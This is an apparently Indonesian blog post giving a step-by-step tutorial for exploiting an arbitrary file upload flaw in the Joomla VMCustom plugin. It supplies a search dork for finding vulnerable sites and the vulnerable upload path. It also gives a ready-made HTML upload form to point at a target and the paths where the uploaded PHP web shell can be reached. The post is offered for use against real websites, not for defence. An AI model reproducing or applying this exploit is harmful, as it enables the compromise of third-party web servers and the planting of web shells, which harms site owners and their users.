Assalamualakum Mas Mbah :D
Sekarang sya akan memberikan Tutorial "Joomla Plugins VMCOSTUM Arbitrary File Upload"
Sebenarnya sya dapat tutor ini cuman jalan jalan ke blog orang sih :v
Klau gitu langsung aja baca artikel di bwah ini yah mas mbah :D .
Dork : inurl:/plugins/vmcustom/
Masukkan dork diatas menggunakan mesin pencarian bukan mesin ketik yah :D
klau udah pilih salah satu web masukkan exploitnya kyak di bwah ini
"site.com/path/plugins/vmcustom/photoupload/assets/server/php/"
tanda vulnerable webnya kyak gini mas mbah
Klau Sudah kyak gitu sisa upload shellmu dengan menggunakan csrf di bwah
<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload</font>
<form method="POST" action="TARGET.com/path/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form><br>
Yang berwarna biru ganti dengan web vuln target yg sudah di dapat .
save dengan extensi .html mas mbah :D .
File yg bsa di upload cuman yg berextensi : PHP,HTML,JPG,PNG,JPEG,GIF .
Klau sudah di upload panggil shellnya disini
"www.site.com/tmp/shellberbentukrandom.php"
Atau
"www.site.com/tmp/nx_d5cc371096f4e5516bf0ea7b10707d68/0/Shellmu.php"
Mudahkan Sisa praktekin dan tetap santai yah :D
Klau Kurang mengerti atau kurang vaham sisa isi kolom komentar yah :D
Exploit Author : AnoaGhost
Source Images : https://shirotenshii.blogspot.co.id/
Thanks To : PhantomGhost - Sulawesi IT Sec